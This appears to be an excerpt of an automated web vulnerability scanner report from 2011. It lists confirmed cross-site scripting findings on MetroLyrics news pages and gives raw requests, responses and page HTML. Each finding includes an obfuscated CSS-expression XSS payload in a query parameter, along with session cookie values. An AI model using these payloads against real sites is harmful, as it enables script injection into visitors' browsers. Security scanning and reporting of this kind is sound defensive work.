<div id="hdr-sub-forum" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-driver" class="navprimaryli">
<a href="http://itunes.apple.com/us/app/metrolyrics-pro/id370144420?mt=8" target="_blank" rel="nofollow" title="Get our iPhone App" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Driver Click', 'metrolyrics Pro App']);">Contests</a>
</li>
</ul>
<ul id="myml">

<li class="navprimaryli"><a href="/request.php" title="My MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'My MetroLyrics', 'Not logged in']);">My MetroLyrics<span></span></a></li>
<li class="navprimaryli"><div id="fb_login_btn"><fb:login-button size="small" perms="email"></fb:login-button></div><div id="fb-root"></div></li>
<li class="myml-alt myml-altfirst navprimaryli"><a href="/register.php" title="Sign Up for MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Sign Up']);">Sign Up</a></li>
<li class="myml-alt navprimaryli"><a rel="nofollow" id="login_link" class="iframe" href="/login.php" title="Login" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Log In']);">Log In</a></li>

</ul>
</div>
</div>

<div id="headermid">
<div class="headerwrap">

<div id="headerlogo"><a href="/" title="Home">MetroLyrics</a></div>
<div id="headersearch">
<form method="get" action="/search.php">
<input type="hidden" name="category" value="artisttitle" />
<input type="text" name="search" onclick="if (this.value == 'Find Your Lyrics, Artists, Videos, more...') this.value='';_gaq.push(['_trackEvent', 'Search', 'Header Main Click']);" value="Find Your Lyrics, Artists, Videos, more..." onblur="if(this.value == '') this.value='Find Your Lyrics, Artists, Videos, more...'" id="hdr-ipsearch" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-btnsearch" />
</form>
<p id="hdr-browse"></p>
</div>

</div>
</div>

<div id="headerbot">
<div class="headerwrap">

<p id="breadcrumbs">
<a href="/" id="bc-home" title="Home">Home</a> &raquo;
<a href="#" id="bc-tab"></a>
</p>
</div>
</div>

<div id="headerad">
<div id="hdrleaderboard">
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_728x90;tile=2;sz=728x90;ord=1299460893?"></script>
</div>
<div id="hdrsocial">
<div class="addthis_default_style">
<a class="addthis_button_facebook_like" fb:like:layout="box_count" fb:like:width="48" fb:like:height="63" addthis:url="http://www.facebook.com/metrolyrics"></a>
<a class="addthis_button_tweet" tw:count="vertical" addthis:url="http://www.metrolyrics.com"></a>
<a class="addthis_counter"></a>
</div>
</div>
</div>

<div id="headercta"><a href="/register.php" title="Join MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Header', 'Join Community Image']);">Join the MetroLyrics Community Today!</a></div>

</div>

<div id="main">

<div id="LRcolumns">
<div id="left">
<div id="Acolumn">
<div id="navLeft">
<img src="http://artists.ml-cdn.com/profile/7155LionelRichieProfile.jpg" alt="Lionel Richie" width="166" />
<h2><a href="lionel-richie-overview.html" title="Lionel Richie Overview">Lionel Richie</a></h2>
<p class="addtofav">


<a href="request.php?dothis=become_a_fan&amp;artistid=7155" title="Add to My Favorites">Add to My Favorites</a>

</p>
<ul id="artistnav" title="News-int/lionel-richie/7155/0">
<li><a title="Lionel Richie Overview" href="/lionel-richie-overview.html" >Overview</a></li>
<li><a title="Lionel Richie News" href="/lionel-richie-gossip-news.html" >News</a></li>
<li><a title="Lionel Richie Awards" href="/lionel-richie-awards-featured.html" >Awards</a></li>
<li><a title="Lionel Richie Albums" href="/lionel-richie-albums-list.html" >Albums</a></li>
<li><a title="Lionel Richie Lyrics" href="/lionel-richie-lyrics.html" >Lyrics</a></li>
<li><a title="Lionel Richie Videos" href="/lionel-richie-music-videos.html" >Videos</a></li>
<li><a title="Lionel Richie Pictures" href="/lionel-richie-pictures.html" >Pictures</a></li>
</ul>
</div>
<div class="module" id="ipod"><script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_160x600;tile=4;sz=160x600;ord=1299460893?"></script></div>
<div class="module"><div id="jqpollwrapper">
<div id="jqpoll">
<div id="jqpollhdr"><h4><span class="icoPoll">&nbsp;</span>Poll</h4></div>
<div id="jqpollbody">
<p>Have you downloaded our iPhone app?</p>
<ul id="pollresults">
<li style="display:none"></li>
<li><input type="radio" name="poll" value="5_18" />Y..
- /2011-kylie-minogue-cries-while-talking-about-cancer-battle-news.html

/2011-kylie-minogue-cries-while-talking-about-cancer-battle-news.html CONFIRMED

http://www.metrolyrics.com/2011-kylie-minogue-cries-while-talking-about-cancer-battle-news.html?nsex..

Parameters

Parameter Type Value
nsextt GET " stYle=x:expre/**/ssion(alert(9)) ns="

Request

GET /2011-kylie-minogue-cries-while-talking-about-cancer-battle-news.html?nsextt=%22%20stYle=x:expre/**/ssion(netsparker(9))%20ns=%22 HTTP/1.1
Referer: http://www.metrolyrics.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.metrolyrics.com
Cookie: bblastvisit=1299460445; bbsessionhash=e10cebe70021d6be2f59d8cef6bb329f; bblastactivity=1299460453
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: LiteSpeed
X-Powered-By: PHP/5.3.2
Pragma: private
Content-Type: text/html; charset=utf-8
Content-Encoding:
Content-Length: 10598
Cache-Control: private, max-age=3600
Date: Mon, 07 Mar 2011 01:21:37 GMT
Connection: keep-alive
Vary: Accept-Encoding



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.com/help/api-spec" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="classification" content="music" />
<meta name="description" content="Kylie Minogue cries while talking about cancer battle News about Kylie Minogue" />
<meta name="keywords" content="Kylie Minogue cries while talking about cancer battle" />
<meta property="fb:page_id" content="81914997331" />
<title>KYLIE MINOGUE CRIES WHILE TALKING ABOUT CANCER BATTLE</title>

<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="search" type="application/opensearchdescription+xml" title="metrolyrics" href="/tools/ff_search_bar.xml" />
<link href="/xml/justreleased.xml" rel="alternate" type="application/rss+xml" title="Recently Released Albums" />
<link href="/xml/futurerelease.xml" rel="alternate" type="application/rss+xml" title="Upcoming Album Releases" />
<link href="/xml/topartists.xml" rel="alternate" type="application/rss+xml" title="Top 20 Artists This Week" />
<link href="/xml/topsongs.xml" rel="alternate" type="application/rss+xml" title="Top 20 Lyrics This Week" />


<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript">
<!--//
//variables
var noEgg = false;
var nav={"activeTab":"news","section":"Kylie Minogue","sectionURL":"kylie-minogue-lyrics.html","title":"Kylie Minogue cries while talking about cancer battle"},

//Set dev server flag
is_dev = false,
//Analytics vars
_comscore = _comscore || [],
_gaq = _gaq || [];
//end analytics vars
//end variables

//start comscore tag
_comscore.push({ c1: "2", c2: "6036538", c3: "" });

(function() {
var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
el.parentNode.insertBefore(s, el);
})();

// Google tracking
_gaq.push(
['_setAccount', 'UA-50802-1'],
['_setCustomVar',1,"User Group ID",1,2],

['_trackPageview']
);


(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

// End Google tracking

//page specific JS

//End page specific JS
//-->
</script>

<link href="/css/g/artist_v2_sprite.css" rel="stylesheet" type="text/css" media="screen" />

<!--[if IE 6]>
<script type="text/javascript" src="/js/iepngfix_tilebg.js"></script>
<![endif]-->


<script type="text/javascript">
__compete_code = '1980f0cd513fe80da3622c2ebed79163';
(function () {
var s = document.createElement('script'),
e = document.getElementsByTagName('script')[0],
t = document.location.protocol.toLowerCase() === 'https:' ?
'https://c.compete.com/bootstrap/' :
'http://c.compete.com/bootstrap/';
s.src = t + __compete_code + '/bootstrap.js';
s.type = 'text/javascript';
s.async = true;
if (e) { e.parentNode.insertBefore(s, e); }
}());
</script>

<!-- Quantcast Tag -->
<script type="text/javascript">
var _qevents = _qevents || [];

(function() {
var elem = document.createElement('script');
elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://edge") + ".quantserve.com/quant.js";
elem.async = true;
elem.type = "text/javascript";
var scpt = document.getElementsByTagName('script')[0];
scpt.parentNode.insertBefore(elem, scpt);
})();

_qevents.push({
qacct:"p-c4eKHIvvd1eXQ"
});
</script>

<noscript>
<div style="display:none;">
<img src="//pixel.quantserve.com/pixel/p-c4eKHIvvd1eXQ.gif" border="0" height="1" width="1" alt="Quantcast"/>
</div>
</noscript>
<!-- End Quantcast tag -->





</head>


<!--[if IE 6 ]><body class="ie6"><![endif]-->
<!--[if IE 7 ]><body class="ie7"><![endif]-->
<!--[if gt IE 6 ]><body><![endif]-->
<!--[if !IE]><!--><body><!--<![endif]-->
<!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->



<div id="bg-main">
<!-- Begin comScore Tag -->
<noscript>
<div style="display:none"> <img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036538&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" alt="scorecard tracking image"/> </div>
</noscript>
<!-- End comScore Tag -->
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_1x1;tile=1;sz=1x1;ord=1299460897?"></script>

<div id="header">

<h1>Kylie Minogue cries while talking about cancer battle</h1>

<div id="hdr-scroll">
<div id="hdr-scrollmenu">
<script type="text/javascript">var addthis_config = {ui_hover_direction: -1, data_ga_property: 'UA-50802-1', "data_track_clickback":true};</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=metroleap"></script>
<ul>
<li class="first"><img src="http://misc.ml-cdn.com/images/n2/loading_inline.gif" alt="Loading..." /></li>
</ul>
</div>
<div id="hdr-scrollsearch">
<form action="/search.php" method="get">
<input type="text" name="search" onclick="_gaq.push(['_trackEvent', 'Search', 'Header Dropdown Click']);if (this.value == 'Search ...') this.value=''" value="Search ..." onblur="if(this.value == '') this.value='Search ...'" id="hdr-scrollsearchip" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-scrollsearchbtn" />
</form>
</div>
</div>
<div id="headertop">
<div class="headerwrap">
<ul id="navmain">
<li id="hdr-lyrics" class="navprimaryli" data-tabname="lyrics">
<a href="/" class="navprimarya" title="Lyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Lyrics']);"><span></span>Lyrics</a>
<div id="hdr-sub-lyrics" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-artists" class="navprimaryli" data-tabname="artists">
<a href="/top-artists.html" title="Artists" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Artists']);"><span></span>Artists</a>
<div id="hdr-sub-artists" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-soundtracks" class="navprimaryli" data-tabname="soundtracks">
<a href="/soundtracks.html" title="soundtracks" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Soundtracks']);"><span></span>Soundtracks</a>
<div id="hdr-sub-soundtracks" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-news" class="navprimaryli" data-tabname="news">
<a href="/news.html" title="News" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'News']);"><span></span>News</a>
<div id="hdr-sub-news" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-apps" class="navprimaryli" data-tabname="apps">
<a href="/apps.html" title="Apps" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Apps']);"><span></span>Apps</a>
<div id="hdr-sub-apps" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-forum" class="navprimaryli" data-tabname="forum">
<a href="/forum/" title="Forum" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Forum']);"><span></span>Forum</a>
<div id="hdr-sub-forum" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-driver" class="navprimaryli">
<a href="http://itunes.apple.com/us/app/metrolyrics-pro/id370144420?mt=8" target="_blank" rel="nofollow" title="Get our iPhone App" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Driver Click', 'metrolyrics Pro App']);">Contests</a>
</li>
</ul>
<ul id="myml">

<li class="navprimaryli"><a href="/request.php" title="My MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'My MetroLyrics', 'Not logged in']);">My MetroLyrics<span></span></a></li>
<li class="navprimaryli"><div id="fb_login_btn"><fb:login-button size="small" perms="email"></fb:login-button></div><div id="fb-root"></div></li>
<li class="myml-alt myml-altfirst navprimaryli"><a href="/register.php" title="Sign Up for MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Sign Up']);">Sign Up</a></li>
<li class="myml-alt navprimaryli"><a rel="nofollow" id="login_link" class="iframe" href="/login.php" title="Login" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Log In']);">Log In</a></li>

</ul>
</div>
</div>

<div id="headermid">
<div class="headerwrap">

<div id="headerlogo"><a href="/" title="Home">MetroLyrics</a></div>
<div id="headersearch">
<form method="get" action="/search.php">
<input type="hidden" name="category" value="artisttitle" />
<input type="text" name="search" onclick="if (this.value == 'Find Your Lyrics, Artists, Videos, more...') this.value='';_gaq.push(['_trackEvent', 'Search', 'Header Main Click']);" value="Find Your Lyrics, Artists, Videos, more..." onblur="if(this.value == '') this.value='Find Your Lyrics, Artists, Videos, more...'" id="hdr-ipsearch" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-btnsearch" />
</form>
<p id="hdr-browse"></p>
</div>

</div>
</div>

<div id="headerbot">
<div class="headerwrap">

<p id="breadcrumbs">
<a href="/" id="bc-home" title="Home">Home</a> &raquo;
<a href="#" id="bc-tab"></a>
</p>
</div>
</div>

<div id="headerad">
<div id="hdrleaderboard">
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_728x90;tile=2;sz=728x90;ord=1299460897?"></script>
</div>
<div id="hdrsocial">
<div class="addthis_default_style">
<a class="addthis_button_facebook_like" fb:like:layout="box_count" fb:like:width="48" fb:like:height="63" addthis:url="http://www.facebook.com/metrolyrics"></a>
<a class="addthis_button_tweet" tw:count="vertical" addthis:url="http://www.metrolyrics.com"></a>
<a class="addthis_counter"></a>
</div>
</div>
</div>

<div id="headercta"><a href="/register.php" title="Join MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Header', 'Join Community Image']);">Join the MetroLyrics Community Today!</a></div>

</div>

<div id="main">

<div id="LRcolumns">
<div id="left">
<div id="Acolumn">
<div id="navLeft">
<img src="http://artists.ml-cdn.com/profile/6747KylieMinogueProfile.jpg" alt="Kylie Minogue" width="166" />
<h2><a href="kylie-minogue-overview.html" title="Kylie Minogue Overview">Kylie Minogue</a></h2>
<p class="addtofav">


<a href="request.php?dothis=become_a_fan&amp;artistid=6747" title="Add to My Favorites">Add to My Favorites</a>

</p>
<ul id="artistnav" title="News-int/kylie-minogue/6747/0">
<li><a title="Kylie Minogue Overview" href="/kylie-minogue-overview.html" >Overview</a></li>
<li><a title="Kylie Minogue News" href="/kylie-minogue-gossip-news.html" >News</a></li>
<li><a title="Kylie Minogue Awards" href="/kylie-minogue-awards-featured.html" >Awards</a></li>
<li><a title="Kylie Minogue Albums" href="/kylie-minogue-albums-list.html" >Albums</a></li>
<li><a title="Kylie Minogue Lyrics" href="/kylie-minogue-lyrics.html" >Lyrics</a></li>
<li><a title="Kylie Minogue Videos" href="/kylie-minogue-music-videos.html" >Videos</a></li>
<li><a title="Kylie Minogue Pictures" href="/kylie-minogue-pictures.html" >Pictures</a></li>
</ul>
</div>
<div class="module" id="ipod"><script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_160x600;tile=4;sz=160x600;ord=1299460897?"></script></div>
<div class="module"><div id="jqpollwrapper">
<div id="jqpoll">
<div id="jqpollhdr"><h4><span class="icoPoll">&nbsp;</span>Poll</h4></div>
<div id="jqpollbody">
<p>Have you downloaded our iPhone app?</p>
<ul id="pollresults">
<li style="display:none"></li>
<li><input type="radio" name=&..
- /2011-phil-collins-quits-music-business-news.html

/2011-phil-collins-quits-music-business-news.html CONFIRMED

http://www.metrolyrics.com/2011-phil-collins-quits-music-business-news.html?nsextt=%22%20stYle=x:exp..

Parameters

Parameter Type Value
nsextt GET " stYle=x:expre/**/ssion(alert(9)) ns="

Request

GET /2011-phil-collins-quits-music-business-news.html?nsextt=%22%20stYle=x:expre/**/ssion(netsparker(9))%20ns=%22 HTTP/1.1
Referer: http://www.metrolyrics.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.metrolyrics.com
Cookie: bblastvisit=1299460445; bbsessionhash=e10cebe70021d6be2f59d8cef6bb329f; bblastactivity=1299460453
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.2
Pragma: private
Content-Type: text/html; charset=utf-8
Content-Encoding:
Content-Length: 10165
Cache-Control: private, max-age=3600
Date: Mon, 07 Mar 2011 01:21:38 GMT
Connection: keep-alive
Vary: Accept-Encoding



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.com/help/api-spec" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="classification" content="music" />
<meta name="description" content="Phil Collins quits music business News about Phil Collins" />
<meta name="keywords" content="Phil Collins quits music business" />
<meta property="fb:page_id" content="81914997331" />
<title>PHIL COLLINS QUITS MUSIC BUSINESS</title>

<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="search" type="application/opensearchdescription+xml" title="metrolyrics" href="/tools/ff_search_bar.xml" />
<link href="/xml/justreleased.xml" rel="alternate" type="application/rss+xml" title="Recently Released Albums" />
<link href="/xml/futurerelease.xml" rel="alternate" type="application/rss+xml" title="Upcoming Album Releases" />
<link href="/xml/topartists.xml" rel="alternate" type="application/rss+xml" title="Top 20 Artists This Week" />
<link href="/xml/topsongs.xml" rel="alternate" type="application/rss+xml" title="Top 20 Lyrics This Week" />


<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript">
<!--//
//variables
var noEgg = false;
var nav={"activeTab":"news","section":"Phil Collins","sectionURL":"phil-collins-lyrics.html","title":"Phil Collins quits music business"},

//Set dev server flag
is_dev = false,
//Analytics vars
_comscore = _comscore || [],
_gaq = _gaq || [];
//end analytics vars
//end variables

//start comscore tag
_comscore.push({ c1: "2", c2: "6036538", c3: "" });

(function() {
var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
el.parentNode.insertBefore(s, el);
})();

// Google tracking
_gaq.push(
['_setAccount', 'UA-50802-1'],
['_setCustomVar',1,"User Group ID",1,2],

['_trackPageview']
);


(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

// End Google tracking

//page specific JS

//End page specific JS
//-->
</script>

<link href="/css/g/artist_v2_sprite.css" rel="stylesheet" type="text/css" media="screen" />

<!--[if IE 6]>
<script type="text/javascript" src="/js/iepngfix_tilebg.js"></script>
<![endif]-->


<script type="text/javascript">
__compete_code = '1980f0cd513fe80da3622c2ebed79163';
(function () {
var s = document.createElement('script'),
e = document.getElementsByTagName('script')[0],
t = document.location.protocol.toLowerCase() === 'https:' ?
'https://c.compete.com/bootstrap/' :
'http://c.compete.com/bootstrap/';
s.src = t + __compete_code + '/bootstrap.js';
s.type = 'text/javascript';
s.async = true;
if (e) { e.parentNode.insertBefore(s, e); }
}());
</script>

<!-- Quantcast Tag -->
<script type="text/javascript">
var _qevents = _qevents || [];

(function() {
var elem = document.createElement('script');
elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://edge") + ".quantserve.com/quant.js";
elem.async = true;
elem.type = "text/javascript";
var scpt = document.getElementsByTagName('script')[0];
scpt.parentNode.insertBefore(elem, scpt);
})();

_qevents.push({
qacct:"p-c4eKHIvvd1eXQ"
});
</script>

<noscript>
<div style="display:none;">
<img src="//pixel.quantserve.com/pixel/p-c4eKHIvvd1eXQ.gif" border="0" height="1" width="1" alt="Quantcast"/>
</div>
</noscript>
<!-- End Quantcast tag -->





</head>


<!--[if IE 6 ]><body class="ie6"><![endif]-->
<!--[if IE 7 ]><body class="ie7"><![endif]-->
<!--[if gt IE 6 ]><body><![endif]-->
<!--[if !IE]><!--><body><!--<![endif]-->
<!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->



<div id="bg-main">
<!-- Begin comScore Tag -->
<noscript>
<div style="display:none"> <img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036538&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" alt="scorecard tracking image"/> </div>
</noscript>
<!-- End comScore Tag -->
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_1x1;tile=1;sz=1x1;ord=1299460898?"></script>

<div id="header">

<h1>Phil Collins quits music business</h1>

<div id="hdr-scroll">
<div id="hdr-scrollmenu">
<script type="text/javascript">var addthis_config = {ui_hover_direction: -1, data_ga_property: 'UA-50802-1', "data_track_clickback":true};</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=metroleap"></script>
<ul>
<li class="first"><img src="http://misc.ml-cdn.com/images/n2/loading_inline.gif" alt="Loading..." /></li>
</ul>
</div>
<div id="hdr-scrollsearch">
<form action="/search.php" method="get">
<input type="text" name="search" onclick="_gaq.push(['_trackEvent', 'Search', 'Header Dropdown Click']);if (this.value == 'Search ...') this.value=''" value="Search ..." onblur="if(this.value == '') this.value='Search ...'" id="hdr-scrollsearchip" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-scrollsearchbtn" />
</form>
</div>
</div>
<div id="headertop">
<div class="headerwrap">
<ul id="navmain">
<li id="hdr-lyrics" class="navprimaryli" data-tabname="lyrics">
<a href="/" class="navprimarya" title="Lyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Lyrics']);"><span></span>Lyrics</a>
<div id="hdr-sub-lyrics" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-artists" class="navprimaryli" data-tabname="artists">
<a href="/top-artists.html" title="Artists" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Artists']);"><span></span>Artists</a>
<div id="hdr-sub-artists" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-soundtracks" class="navprimaryli" data-tabname="soundtracks">
<a href="/soundtracks.html" title="soundtracks" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Soundtracks']);"><span></span>Soundtracks</a>
<div id="hdr-sub-soundtracks" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-news" class="navprimaryli" data-tabname="news">
<a href="/news.html" title="News" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'News']);"><span></span>News</a>
<div id="hdr-sub-news" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-apps" class="navprimaryli" data-tabname="apps">
<a href="/apps.html" title="Apps" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Apps']);"><span></span>Apps</a>
<div id="hdr-sub-apps" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-forum" class="navprimaryli" data-tabname="forum">
<a href="/forum/" title="Forum" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Forum']);"><span></span>Forum</a>
<div id="hdr-sub-forum" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-driver" class="navprimaryli">
<a href="http://itunes.apple.com/us/app/metrolyrics-pro/id370144420?mt=8" target="_blank" rel="nofollow" title="Get our iPhone App" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Driver Click', 'metrolyrics Pro App']);">Contests</a>
</li>
</ul>
<ul id="myml">

<li class="navprimaryli"><a href="/request.php" title="My MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'My MetroLyrics', 'Not logged in']);">My MetroLyrics<span></span></a></li>
<li class="navprimaryli"><div id="fb_login_btn"><fb:login-button size="small" perms="email"></fb:login-button></div><div id="fb-root"></div></li>
<li class="myml-alt myml-altfirst navprimaryli"><a href="/register.php" title="Sign Up for MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Sign Up']);">Sign Up</a></li>
<li class="myml-alt navprimaryli"><a rel="nofollow" id="login_link" class="iframe" href="/login.php" title="Login" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Log In']);">Log In</a></li>

</ul>
</div>
</div>

<div id="headermid">
<div class="headerwrap">

<div id="headerlogo"><a href="/" title="Home">MetroLyrics</a></div>
<div id="headersearch">
<form method="get" action="/search.php">
<input type="hidden" name="category" value="artisttitle" />
<input type="text" name="search" onclick="if (this.value == 'Find Your Lyrics, Artists, Videos, more...') this.value='';_gaq.push(['_trackEvent', 'Search', 'Header Main Click']);" value="Find Your Lyrics, Artists, Videos, more..." onblur="if(this.value == '') this.value='Find Your Lyrics, Artists, Videos, more...'" id="hdr-ipsearch" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-btnsearch" />
</form>
<p id="hdr-browse"></p>
</div>

</div>
</div>

<div id="headerbot">
<div class="headerwrap">

<p id="breadcrumbs">
<a href="/" id="bc-home" title="Home">Home</a> &raquo;
<a href="#" id="bc-tab"></a>
</p>
</div>
</div>

<div id="headerad">
<div id="hdrleaderboard">
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_728x90;tile=2;sz=728x90;ord=1299460898?"></script>
</div>
<div id="hdrsocial">
<div class="addthis_default_style">
<a class="addthis_button_facebook_like" fb:like:layout="box_count" fb:like:width="48" fb:like:height="63" addthis:url="http://www.facebook.com/metrolyrics"></a>
<a class="addthis_button_tweet" tw:count="vertical" addthis:url="http://www.metrolyrics.com"></a>
<a class="addthis_counter"></a>
</div>
</div>
</div>

<div id="headercta"><a href="/register.php" title="Join MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Header', 'Join Community Image']);">Join the MetroLyrics Community Today!</a></div>

</div>

<div id="main">

<div id="LRcolumns">
<div id="left">
<div id="Acolumn">
<div id="navLeft">
<img src="http://artists.ml-cdn.com/profile/9409PhilCollinsProfile.jpg" alt="Phil Collins" width="166" />
<h2><a href="phil-collins-overview.html" title="Phil Collins Overview">Phil Collins</a></h2>
<p class="addtofav">


<a href="request.php?dothis=become_a_fan&amp;artistid=9409" title="Add to My Favorites">Add to My Favorites</a>

</p>
<ul id="artistnav" title="News-int/phil-collins/9409/0">
